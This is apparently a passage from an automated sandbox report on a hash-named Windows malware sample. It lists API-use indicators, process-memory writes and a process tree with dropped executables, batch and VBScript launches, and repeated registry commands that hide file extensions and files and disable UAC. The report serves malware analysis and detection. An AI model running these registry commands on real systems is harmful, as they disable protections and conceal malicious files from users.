N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2352 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Users\Admin\tIUAwkcA\WYUQIMko.exe
PID 2352 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Users\Admin\tIUAwkcA\WYUQIMko.exe
PID 2352 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Users\Admin\tIUAwkcA\WYUQIMko.exe
PID 2352 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Users\Admin\tIUAwkcA\WYUQIMko.exe
PID 2352 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\ProgramData\XggMMcAg\LkAAYskU.exe
PID 2352 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\ProgramData\XggMMcAg\LkAAYskU.exe
PID 2352 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\ProgramData\XggMMcAg\LkAAYskU.exe
PID 2352 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\ProgramData\XggMMcAg\LkAAYskU.exe
PID 2352 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2512 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 2512 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 2512 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 2512 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 2352 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2352 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2352 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2352 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2352 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2352 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2352 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2352 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2352 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2352 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2352 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2352 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2352 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2836 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2836 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2836 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2836 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2848 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 2808 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 2808 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 2808 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 2848 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 1436 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1436 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1436 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1436 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

"C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe"

C:\Users\Admin\tIUAwkcA\WYUQIMko.exe

"C:\Users\Admin\tIUAwkcA\WYUQIMko.exe"

C:\ProgramData\XggMMcAg\LkAAYskU.exe

"C:\ProgramData\XggMMcAg\LkAAYskU.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\IWMgwYQg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\eWEUIQso.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\EmsMUAkI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\DiAkkggQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\mKgAkkUE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\caAgUEkA.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

